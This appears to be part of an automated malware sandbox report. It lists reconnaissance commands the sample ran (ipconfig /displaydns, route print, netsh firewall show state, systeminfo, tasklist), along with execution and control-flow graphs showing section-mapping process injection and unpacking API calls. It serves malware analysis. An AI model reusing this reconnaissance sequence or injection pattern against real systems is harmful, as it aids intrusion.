                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:37
                                                                                                                                                              Start time:09:40:19
                                                                                                                                                              Start date:30/09/2024
                                                                                                                                                              Path:C:\Windows\System32\ipconfig.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:ipconfig /displaydns
                                                                                                                                                              Imagebase:0x7ff628b60000
                                                                                                                                                              File size:35'840 bytes
                                                                                                                                                              MD5 hash:62F170FB07FDBB79CEB7147101406EB8
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:38
                                                                                                                                                              Start time:09:40:20
                                                                                                                                                              Start date:30/09/2024
                                                                                                                                                              Path:C:\Windows\System32\ROUTE.EXE
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:route print
                                                                                                                                                              Imagebase:0x7ff6f9970000
                                                                                                                                                              File size:24'576 bytes
                                                                                                                                                              MD5 hash:3C97E63423E527BA8381E81CBA00B8CD
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:39
                                                                                                                                                              Start time:09:40:22
                                                                                                                                                              Start date:30/09/2024
                                                                                                                                                              Path:C:\Windows\System32\netsh.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:netsh firewall show state
                                                                                                                                                              Imagebase:0x7ff7be450000
                                                                                                                                                              File size:96'768 bytes
                                                                                                                                                              MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:40
                                                                                                                                                              Start time:09:40:26
                                                                                                                                                              Start date:30/09/2024
                                                                                                                                                              Path:C:\Windows\System32\systeminfo.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:systeminfo
                                                                                                                                                              Imagebase:0x7ff7cc6f0000
                                                                                                                                                              File size:110'080 bytes
                                                                                                                                                              MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:42
                                                                                                                                                              Start time:09:40:38
                                                                                                                                                              Start date:30/09/2024
                                                                                                                                                              Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:tasklist /v /fo csv
                                                                                                                                                              Imagebase:0x7ff760070000
                                                                                                                                                              File size:106'496 bytes
                                                                                                                                                              MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Reset < >

                                                                                                                                                                Execution Graph

                                                                                                                                                                Execution Coverage:9.8%
                                                                                                                                                                Dynamic/Decrypted Code Coverage:28.8%
                                                                                                                                                                Signature Coverage:43.5%
                                                                                                                                                                Total number of Nodes:170
                                                                                                                                                                Total number of Limit Nodes:6
                                                                                                                                                                execution_graph 3388 402e40 3390 402e37 3388->3390 3391 402edf 3390->3391 3392 4018e6 3390->3392 3393 4018f5 3392->3393 3394 40192e Sleep 3393->3394 3395 401949 3394->3395 3397 40195a 3395->3397 3398 401514 3395->3398 3397->3391 3399 401524 3398->3399 3400 4015c4 NtDuplicateObject 3399->3400 3409 4016e0 3399->3409 3401 4015e1 NtCreateSection 3400->3401 3400->3409 3402 401661 NtCreateSection 3401->3402 3403 401607 NtMapViewOfSection 3401->3403 3404 40168d 3402->3404 3402->3409 3403->3402 3405 40162a NtMapViewOfSection 3403->3405 3406 401697 NtMapViewOfSection 3404->3406 3404->3409 3405->3402 3407 401648 3405->3407 3408 4016be NtMapViewOfSection 3406->3408 3406->3409 3407->3402 3408->3409 3409->3397 3410 4190c0 3413 418c80 3410->3413 3412 4190c5 3414 418c8d 3413->3414 3415 418d90 7 API calls 3414->3415 3416 418ee3 3414->3416 3418 418e15 7 API calls 3415->3418 3417 418ef1 SetCommMask 3416->3417 3421 418f01 GetUserObjectInformationW 3416->3421 3424 418f22 3416->3424 3417->3416 3419 418ec1 3418->3419 3420 418eb5 ObjectPrivilegeAuditAlarmA 3418->3420 3422 418ed2 3419->3422 3423 418eca WaitForSingleObject 3419->3423 3420->3419 3421->3416 3422->3416 3423->3422 3425 418f2b GetConsoleAliasesLengthA GetComputerNameW GetConsoleAliasExesLengthW GetBinaryType PurgeComm 3424->3425 3426 418f9d 3424->3426 3433 418f7b 3425->3433 3439 418910 LocalAlloc 3426->3439 3430 418fa2 LoadLibraryA 3440 418940 GetModuleHandleW GetProcAddress VirtualProtect 3430->3440 3431 418fed 3441 418be0 3431->3441 3433->3426 3434 419009 MoveFileW 3435 418ff2 3434->3435 3435->3434 3436 419033 InterlockedCompareExchange 3435->3436 3438 41904d 3435->3438 3436->3435 3438->3412 3439->3430 3440->3431 3442 418c09 QueryDosDeviceA 3441->3442 3443 418c1d 3441->3443 3442->3443 3452 418ae0 3443->3452 3446 418c30 FreeEnvironmentStringsA 3447 418c38 3446->3447 3455 418b20 3447->3455 3450 418c66 3450->3435 3451 418c4f HeapDestroy GetNumaProcessorNode 3451->3450 3453 418af1 FatalAppExitA GetModuleHandleW 3452->3453 3454 418b03 3452->3454 3453->3454 3454->3446 3454->3447 3456 418b3c 3455->3456 3457 418b2e BuildCommDCBA 3455->3457 3458 418b44 FreeEnvironmentStringsA 3456->3458 3460 418b4c 3456->3460 3457->3460 3458->3460 3461 418b7d GetNumaAvailableMemoryNode SetCalendarInfoW OpenJobObjectA BackupSeek 3460->3461 3462 418bbb 3460->3462 3463 418b10 3460->3463 3461->3460 3462->3450 3462->3451 3466 418a90 3463->3466 3467 418abb 3466->3467 3468 418aac SetPriorityClass 3466->3468 3467->3460 3468->3467 3567 401542 3568 40153b 3567->3568 3569 4015c4 NtDuplicateObject 3568->3569 3570 4016e0 3568->3570 3569->3570 3571 4015e1 NtCreateSection 3569->3571 3572 401661 NtCreateSection 3571->3572 3573 401607 NtMapViewOfSection 3571->3573 3572->3570 3574 40168d 3572->3574 3573->3572 3575 40162a NtMapViewOfSection 3573->3575 3574->3570 3576 401697 NtMapViewOfSection 3574->3576 3575->3572 3577 401648 3575->3577 3576->3570 3578 4016be NtMapViewOfSection 3576->3578 3577->3572 3578->3570 3491 216003c 3492 2160049 3491->3492 3504 2160e0f SetErrorMode SetErrorMode 3492->3504 3497 2160265 3498 21602ce VirtualProtect 3497->3498 3500 216030b 3498->3500 3499 2160439 VirtualFree 3503 21604be LoadLibraryA 3499->3503 3500->3499 3502 21608c7 3503->3502 3505 2160223 3504->3505 3506 2160d90 3505->3506 3507 2160dad 3506->3507 3508 2160dbb GetPEB 3507->3508 3509 2160238 VirtualAlloc 3507->3509 3508->3509 3509->3497 3631 402dd0 3632 402ddc 3631->3632 3633 4018e6 8 API calls 3632->3633 3634 402edf 3632->3634 3633->3634 3548 4018f1 3549 4018f6 3548->3549 3550 40192e Sleep 3549->3550 3551 401949 3550->3551 3552 401514 7 API calls 3551->3552 3553 40195a 3551->3553 3552->3553 3469 791f8a 3472 791f9a 3469->3472 3473 791fa9 3472->3473 3476 79273a 3473->3476 3481 792755 3476->3481 3477 79275e CreateToolhelp32Snapshot 3478 79277a Module32First 3477->3478 3477->3481 3479 792789 3478->3479 3482 791f99 3478->3482 3483 7923f9 3479->3483 3481->3477 3481->3478 3484 792424 3483->3484 3485 792435 VirtualAlloc 3484->3485 3486 79246d 3484->3486 3485->3486 3510 2160005 3515 216092b GetPEB 3510->3515 3512 2160030 3517 216003c 3512->3517 3516 2160972 3515->3516 3516->3512 3518 2160049 3517->3518 3519 2160e0f 2 API calls 3518->3519 3520 2160223 3519->3520 3521 2160d90 GetPEB 3520->3521 3522 2160238 VirtualAlloc 3521->3522 3523 2160265 3522->3523 3524 21602ce VirtualProtect 3523->3524 3526 216030b 3524->3526 3525 2160439 VirtualFree 3529 21604be LoadLibraryA 3525->3529 3526->3525 3528 21608c7 3529->3528 3618 401915 3619 4018c6 3618->3619 3620 40191a 3618->3620 3621 40192e Sleep 3620->3621 3622 401949 3621->3622 3623 401514 7 API calls 3622->3623 3624 40195a 3622->3624 3623->3624 3487 402f97 3488 4030ee 3487->3488 3489 402fc1 3487->3489 3489->3488 3490 40307c RtlCreateUserThread NtTerminateProcess 3489->3490 3490->3488 3530 2160001 3531 2160005 3530->3531 3532 216092b GetPEB 3531->3532 3533 2160030 3532->3533 3534 216003c 7 API calls 3533->3534 3535 2160038 3534->3535 3591 418b56 3592 418b60 3591->3592 3593 418b10 SetPriorityClass 3592->3593 3594 418b7d GetNumaAvailableMemoryNode SetCalendarInfoW OpenJobObjectA BackupSeek 3592->3594 3595 418bbb 3592->3595 3593->3592 3594->3592 3608 402d7b 3609 402d38 3608->3609 3609->3608 3610 402dc7 3609->3610 3611 4018e6 8 API calls 3609->3611 3611->3610 3554 4014fe 3555 401506 3554->3555 3556 401531 3554->3556 3557 4015c4 NtDuplicateObject 3556->3557 3566 4016e0 3556->3566 3558 4015e1 NtCreateSection 3557->3558 3557->3566 3559 401661 NtCreateSection 3558->3559 3560 401607 NtMapViewOfSection 3558->3560 3561 40168d 3559->3561 3559->3566 3560->3559 3562 40162a NtMapViewOfSection 3560->3562 3563 401697 NtMapViewOfSection 3561->3563 3561->3566 3562->3559 3564 401648 3562->3564 3565 4016be NtMapViewOfSection 3563->3565 3563->3566 3564->3559 3565->3566

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 0 418c80-418ca8 2 418cb0-418cb7 0->2 3 418ce4-418cea 2->3 4 418cb9-418ce0 2->4 5 418cec-418cf8 3->5 6 418cfe-418d08 3->6 4->3 5->6 7 418d43-418d4a 6->7 8 418d0a-418d39 6->8 7->2 9 418d50-418d56 7->9 8->7 11 418d58-418d5e 9->11 12 418d60-418d66 11->12 13 418d6c-418d76 11->13 12->13 14 418d78 13->14 15 418d7a-418d81 13->15 14->15 15->11 16 418d83-418d8a 15->16 17 418d90-418eb3 InterlockedCompareExchange SetFocus ReadConsoleA FindAtomW SearchPathA GetConsoleMode SearchPathW GetDefaultCommConfigA CopyFileExA CreatePipe GetEnvironmentStringsW WriteConsoleOutputA GetModuleFileNameW GetSystemTimeAdjustment 16->17 18 418ee3-418eef 16->18 22 418ec1-418ec8 17->22 23 418eb5-418ebb ObjectPrivilegeAuditAlarmA 17->23 19 418ef1-418eff SetCommMask 18->19 24 418f11-418f17 19->24 25 418f01-418f0b GetUserObjectInformationW 19->25 26 418ed2-418ee0 22->26 27 418eca-418ecc WaitForSingleObject 22->27 23->22 28 418f22-418f29 24->28 29 418f19-418f20 24->29 25->24 26->18 27->26 30 418f2b-418f9a GetConsoleAliasesLengthA GetComputerNameW GetConsoleAliasExesLengthW GetBinaryType PurgeComm 28->30 31 418f9d-418fac call 418910 28->31 29->19 29->28 30->31 37 418fdd-418fe8 LoadLibraryA call 418940 31->37 38 418fae-418fbf 31->38 44 418fed-418ffe call 418be0 37->44 39 418fc0-418fd0 38->39 42 418fd2 39->42 43 418fd8-418fdb 39->43 42->43 43->37 43->39 49 419000-419007 44->49 50 419009-419017 MoveFileW 49->50 51 41901d-419023 49->51 50->51 52 419025 call 418930 51->52 53 41902a-419031 51->53 52->53 57 419033-41903e InterlockedCompareExchange 53->57 58 419044-41904b 53->58 57->58 58->49 60 41904d-41905d 58->60 62 419060-419070 60->62 63 419072 62->63 64 419079-41907c 62->64 63->64 64->62 65 41907e-419089 64->65 66 419090-419095 65->66 67 419097-41909d 66->67 68 41909f-4190a5 66->68 67->68 69 4190a7-4190b4 67->69 68->66 68->69
                                                                                                                                                                APIs
                                                                                                                                                                • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00418D9B
                                                                                                                                                                • SetFocus.USER32(00000000), ref: 00418DA4
                                                                                                                                                                • ReadConsoleA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00418DAF
                                                                                                                                                                • FindAtomW.KERNEL32(00000000), ref: 00418DB6
                                                                                                                                                                • SearchPathA.KERNEL32(0041B3E4,0041B3CC,0041B3B8,00000000,?,?), ref: 00418DDA
                                                                                                                                                                • GetConsoleMode.KERNEL32(00000000,00000000), ref: 00418DE2
                                                                                                                                                                • SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00418DFA
                                                                                                                                                                • GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 00418E21
                                                                                                                                                                • CopyFileExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418E2D
                                                                                                                                                                • CreatePipe.KERNEL32(?,00000000,00000000,00000000), ref: 00418E43
                                                                                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 00418E49
                                                                                                                                                                • WriteConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 00418E8E
                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000000), ref: 00418E9D
                                                                                                                                                                • GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 00418EA6
                                                                                                                                                                • ObjectPrivilegeAuditAlarmA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418EBB
                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00418ECC
                                                                                                                                                                • SetCommMask.KERNELBASE(00000000,00000000), ref: 00418EF5
                                                                                                                                                                • GetUserObjectInformationW.USER32(00000000,00000000,00000000,00000000,00000000), ref: 00418F0B
                                                                                                                                                                • GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 00418F3A
                                                                                                                                                                • GetComputerNameW.KERNEL32(?,?), ref: 00418F4E
                                                                                                                                                                • GetConsoleAliasExesLengthW.KERNEL32 ref: 00418F54
                                                                                                                                                                • GetBinaryType.KERNEL32(0041B3F0,?), ref: 00418F66
                                                                                                                                                                • PurgeComm.KERNEL32(00000000,00000000), ref: 00418F6E
                                                                                                                                                                • LoadLibraryA.KERNELBASE(0041B410), ref: 00418FE2
                                                                                                                                                                • MoveFileW.KERNEL32(00000000,00000000), ref: 00419017
                                                                                                                                                                • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 0041903E
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1519684394.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_40b000_OCYe9qcxiM.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Console$CommFileObject$CompareExchangeInterlockedLengthNamePathSearch$AdjustmentAlarmAliasAliasesAtomAuditBinaryComputerConfigCopyCreateDefaultEnvironmentExesFindFocusInformationLibraryLoadMaskModeModuleMoveOutputPipePrivilegePurgeReadSingleStringsSystemTimeTypeUserWaitWrite
                                                                                                                                                                • String ID: k`$}$
                                                                                                                                                                • API String ID: 87775671-956986773
                                                                                                                                                                • Opcode ID: c8a4e5b77a3355490554213bf8507c2ed9d8cb568ec84c329371616b9184d7c2
                                                                                                                                                                • Instruction ID: cec1c0038aff85c57551383c5b233afae2bf81415c058cacd0026c3a6edaf131
                                                                                                                                                                • Opcode Fuzzy Hash: c8a4e5b77a3355490554213bf8507c2ed9d8cb568ec84c329371616b9184d7c2
                                                                                                                                                                • Instruction Fuzzy Hash: 02B1B671901224ABCB219F61DC44BDF7B79EF5D714F00806AF609A71A1DB381A85CFAE

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 156 401514-401533 158 401524-40152f 156->158 159 401536-40156e call 401193 156->159 158->159 168 401570 159->168 169 401573-401578 159->169 168->169 171 401898-4018a0 169->171 172 40157e-40158f 169->172 171->169 175 4018a5-4018b7 171->175 176 401595-4015be 172->176 177 401896 172->177 183 4018c5 175->183 184 4018bc-4018e3 call 401193 175->184 176->177 186 4015c4-4015db NtDuplicateObject 176->186 177->175 183->184 186->177 188 4015e1-401605 NtCreateSection 186->188 190 401661-401687 NtCreateSection 188->190 191 401607-401628 NtMapViewOfSection 188->191 190->177 192 40168d-401691 190->192 191->190 194 40162a-401646 NtMapViewOfSection 191->194 192->177 195 401697-4016b8 NtMapViewOfSection 192->195 194->190 197 401648-40165e 194->197 195->177 198 4016be-4016da NtMapViewOfSection 195->198 197->190 198->177 201 4016e0 call 4016e5 198->201
                                                                                                                                                                APIs
                                                                                                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1519663770.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_OCYe9qcxiM.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1546783058-0
                                                                                                                                                                • Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                                                                                                                                • Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
                                                                                                                                                                • Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                                                                                                                                • Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 203 4014fe-401503 204 401531-40156e call 401193 203->204 205 401506-401511 203->205 215 401570 204->215 216 401573-401578 204->216 215->216 218 401898-4018a0 216->218 219 40157e-40158f 216->219 218->216 222 4018a5-4018b7 218->222 223 401595-4015be 219->223 224 401896 219->224 230 4018c5 222->230 231 4018bc-4018e3 call 401193 222->231 223->224 233 4015c4-4015db NtDuplicateObject 223->233 224->222 230->231 233->224 235 4015e1-401605 NtCreateSection 233->235 237 401661-401687 NtCreateSection 235->237 238 401607-401628 NtMapViewOfSection 235->238 237->224 239 40168d-401691 237->239 238->237 241 40162a-401646 NtMapViewOfSection 238->241 239->224 242 401697-4016b8 NtMapViewOfSection 239->242 241->237 244 401648-40165e 241->244 242->224 245 4016be-4016da NtMapViewOfSection 242->245 244->237 245->224 248 4016e0 call 4016e5 245->248
                                                                                                                                                                APIs
                                                                                                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1519663770.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_OCYe9qcxiM.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Section$CreateDuplicateObjectView
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1652636561-0
                                                                                                                                                                • Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                                                                                                                                • Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
                                                                                                                                                                • Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                                                                                                                                • Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 250 401542-40156e call 401193 259 401570 250->259 260 401573-401578 250->260 259->260 262 401898-4018a0 260->262 263 40157e-40158f 260->263 262->260 266 4018a5-4018b7 262->266 267 401595-4015be 263->267 268 401896 263->268 274 4018c5 266->274 275 4018bc-4018e3 call 401193 266->275 267->268 277 4015c4-4015db NtDuplicateObject 267->277 268->266 274->275 277->268 279 4015e1-401605 NtCreateSection 277->279 281 401661-401687 NtCreateSection 279->281 282 401607-401628 NtMapViewOfSection 279->282 281->268 283 40168d-401691 281->283 282->281 285 40162a-401646 NtMapViewOfSection 282->285 283->268 286 401697-4016b8 NtMapViewOfSection 283->286 285->281 288 401648-40165e 285->288 286->268 289 4016be-4016da NtMapViewOfSection 286->289 288->281 289->268 292 4016e0 call 4016e5 289->292
                                                                                                                                                                APIs
                                                                                                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1519663770.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_OCYe9qcxiM.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1546783058-0
                                                                                                                                                                • Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                                                                                                                                • Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
                                                                                                                                                                • Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                                                                                                                                • Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 294 401549-40156e call 401193 298 401570 294->298 299 401573-401578 294->299 298->299 301 401898-4018a0 299->301 302 40157e-40158f 299->302 301->299 305 4018a5-4018b7 301->305 306 401595-4015be 302->306 307 401896 302->307 313 4018c5 305->313 314 4018bc-4018e3 call 401193 305->314 306->307 316 4015c4-4015db NtDuplicateObject 306->316 307->305 313->314 316->307 318 4015e1-401605 NtCreateSection 316->318 320 401661-401687 NtCreateSection 318->320 321 401607-401628 NtMapViewOfSection 318->321 320->307 322 40168d-401691 320->322 321->320 324 40162a-401646 NtMapViewOfSection 321->324 322->307 325 401697-4016b8 NtMapViewOfSection 322->325 324->320 327 401648-40165e 324->327 325->307 328 4016be-4016da NtMapViewOfSection 325->328 327->320 328->307 331 4016e0 call 4016e5 328->331
                                                                                                                                                                APIs
                                                                                                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1519663770.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_OCYe9qcxiM.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1546783058-0
                                                                                                                                                                • Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                                                                                                                                • Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
                                                                                                                                                                • Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                                                                                                                                • Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 333 401557 334 40155b-40156e call 401193 333->334 335 40154f-401554 333->335 338 401570 334->338 339 401573-401578 334->339 335->334 338->339 341 401898-4018a0 339->341 342 40157e-40158f 339->342 341->339 345 4018a5-4018b7 341->345 346 401595-4015be 342->346 347 401896 342->347 353 4018c5 345->353 354 4018bc-4018e3 call 401193 345->354 346->347 356 4015c4-4015db NtDuplicateObject 346->356 347->345 353->354 356->347 358 4015e1-401605 NtCreateSection 356->358 360 401661-401687 NtCreateSection 358->360 361 401607-401628 NtMapViewOfSection 358->361 360->347 362 40168d-401691 360->362 361->360 364 40162a-401646 NtMapViewOfSection 361->364 362->347 365 401697-4016b8 NtMapViewOfSection 362->365 364->360 367 401648-40165e 364->367 365->347 368 4016be-4016da NtMapViewOfSection 365->368 367->360 368->347 371 4016e0 call 4016e5 368->371
                                                                                                                                                                APIs
                                                                                                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.1519663770.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_OCYe9qcxiM.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1546783058-0
                                                                                                                                                                • Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
